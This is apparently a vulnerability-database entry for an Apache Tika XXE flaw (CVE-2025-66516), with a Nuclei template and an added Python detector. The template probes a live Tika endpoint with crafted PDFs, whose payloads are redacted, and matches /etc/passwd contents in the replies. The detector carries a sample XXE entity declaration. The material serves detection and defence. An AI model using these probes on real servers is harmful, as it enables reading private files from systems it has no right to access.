Apache Tika - XML External Entity Injection
CVE-2025-66516
Verified
Description: Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) contain an XML External Entity injection caused by processing crafted XFA files inside PDFs, letting attackers perform XXE attacks remotely; exploitation requires crafted PDF input.
Severity: High
CVSS Score: 9.8
Exploit Probability: 1%
Published Date: January 19, 2026
Template Author: mathematiciangoat
CVE-2025-66516.yaml
id: CVE-2025-66516

info:
  name: Apache Tika - XML External Entity Injection
  author: MathematicianGoat
  severity: high
  description: |
    Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) contain an XML External Entity injection caused by processing crafted XFA files inside PDFs, letting attackers perform XXE attacks remotely, exploit requires crafted PDF input.
  impact: |
    Attackers can exploit XXE to read local files or cause denial of service, potentially exposing sensitive information or disrupting service.
  remediation: |
    Upgrade tika-core to >= 3.2.2 and ensure tika-pdf-module and tika-parsers are updated to latest versions.
  reference:
    - https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC
    - https://nvd.nist.gov/vuln/detail/CVE-2025-66516
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2025-66516
    epss-score: 0.01458
    epss-percentile: 0.80793
    cwe-id: CWE-611
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Apache Tika"
    fofa-query: title="Apache Tika"
  tags: cve,cve2025,apache,tika,xxe,pdf,lfr

variables:
  # Both values are base64-encoded PDF files; the payloads are not reproduced on this page.
  passwd_payload: "<BASE64_PDF_PAYLOAD_NOT_SHOWN>"
  canary_payload: "<BASE64_PDF_PAYLOAD_NOT_SHOWN>"

http:
  - raw:
      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(passwd_payload)}}
      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(canary_payload)}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: body_1
        regex:
          - "root:.*:0:0:"

      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains_any(body_2, "FileNotFoundException", "No such file")'
        condition: and

    extractors:
      - type: regex
        part: body_1
        group: 1
        regex:
          - 'data:\s*(root:x:0:0:[^\n]+)'
# digest: 4b0a00483046022100f8ae1b411accd495b46b48f97a37e08867744e6086912094801475380243d5c1022100a2bf9560c1934913c7fe415468abeb3c07976dd3931f8704b31319b86be810e0:922c64590222798bb761d5b6d8e72950
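The template above confirms the flaw by submitting a crafted PDF to a live Tika endpoint and matching on what comes back. A defender who wants to catch such files before they reach an unpatched Tika can instead inspect the XFA XML stream inside the PDF for the one thing an XXE payload needs: a DOCTYPE that declares an external (SYSTEM/PUBLIC) entity. The Python checker below is an added example, not part of the Nuclei template or of Tika; the PDF bytes it builds are constructed samples and the entity URI is a placeholder.

```python
import re
import zlib

# Constructed samples (hand-written, not real exploit files). The entity URI is a
# placeholder; detection looks only at the declaration, not at where it points.
XFA_SAFE = (b'<?xml version="1.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">'
            b'<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"/></xdp:xdp>')
XFA_XXE = (b'<?xml version="1.0"?><!DOCTYPE xdp [<!ENTITY ext SYSTEM "file:///PLACEHOLDER">]>'
           b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><data>&ext;</data></xdp:xdp>')

def build_pdf(xfa_xml: bytes, compress: bool) -> bytes:
    """Wrap XFA XML in a minimal PDF skeleton with an /XFA entry (constructed sample)."""
    body = zlib.compress(xfa_xml) if compress else xfa_xml
    filt = b"/Filter /FlateDecode " if compress else b""
    return (b"%PDF-1.7\n1 0 obj\n<< /XFA 2 0 R >>\nendobj\n2 0 obj\n<< " + filt
            + b"/Length " + str(len(body)).encode() + b" >>\nstream\n"
            + body + b"\nendstream\nendobj\n%%EOF\n")

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# <!ENTITY name SYSTEM "..."> or PUBLIC (parameter entities included) is what an XXE
# payload requires; a DOCTYPE with an internal-only DTD is reported for review instead.
EXT_ENTITY_RE = re.compile(rb"<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.I)

def _inflate(raw: bytes) -> bytes:
    """FlateDecode streams are inflated; anything else is inspected as-is."""
    try:
        return zlib.decompress(raw)
    except zlib.error:
        return raw

def find_xfa_external_entities(pdf: bytes) -> list:
    """Return one finding per stream whose XFA XML carries a DOCTYPE."""
    findings = []
    for n, m in enumerate(STREAM_RE.finditer(pdf), 1):
        data = _inflate(m.group(1))
        looks_like_xfa = b"/XFA" in pdf or b"xdp:xdp" in data or b"xfa.org" in data
        if not looks_like_xfa or b"<!DOCTYPE" not in data:
            continue
        if EXT_ENTITY_RE.search(data):
            findings.append(f"stream {n}: external entity declared in XFA XML (XXE)")
        else:
            findings.append(f"stream {n}: DOCTYPE in XFA XML (internal DTD, review)")
    return findings

if __name__ == "__main__":
    for label, xml in (("safe", XFA_SAFE), ("xxe", XFA_XXE)):
        for compress in (False, True):
            print(label, "flate" if compress else "raw",
                  find_xfa_external_entities(build_pdf(xml, compress)))
```

Real PDFs may use other stream filters or object streams, so a production scanner should decode with a PDF library before applying the same DOCTYPE/entity check.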